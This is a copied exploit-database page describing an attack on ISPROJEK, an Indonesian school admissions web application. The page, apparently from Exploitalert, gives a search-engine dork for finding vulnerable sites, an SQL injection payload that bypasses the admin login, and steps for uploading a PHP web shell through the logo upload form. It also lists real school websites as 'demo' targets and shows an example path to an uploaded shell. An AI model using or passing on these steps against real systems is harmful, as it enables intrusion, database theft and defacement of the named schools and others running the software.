Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030120

Below is a copy:

ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability
[+]Exploit Title: ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability
[+]Author: Negat1ve
[+]Team: -1
[+]Goolge Dork: intext:"ISPROJEK"

[+]Tested on: Windows 10 x64 
======================================= 
[+]Proof Of Concept: 

Find website with the dork
Login url will be site.sch.id/path/login.php

Login with this detail
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+

You can upload your file via
1. Click Setting or you can paste the link /index.php?p=f_editadmin
2. Click "Edit" in the admin user or you can paste the link /index.php?p=f_editadmin&mod=edit&id=1
3. Fill all the form, then upload your Shell (php extension) in the "File Logo"

Your files will go to site.sch.id/path/images/logo/yourshell.php
example:
https://aplikasi-cbt.com/ppdb/images/logo/captcha.php

NB: 
- filetype of this uploader is php
- Risk : Execute, Database Leak, Index Defacement, Drop Add Edit Data

Demo sites:
https://aplikasi-cbt.com/ppdb/login.php
https://ma-arrosyidiyah.sch.id/ppdb/login.php
https://mtsyppsbandung.com/ppdb/login.php
https://masirnamiskin.com/ppdb/login.php

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.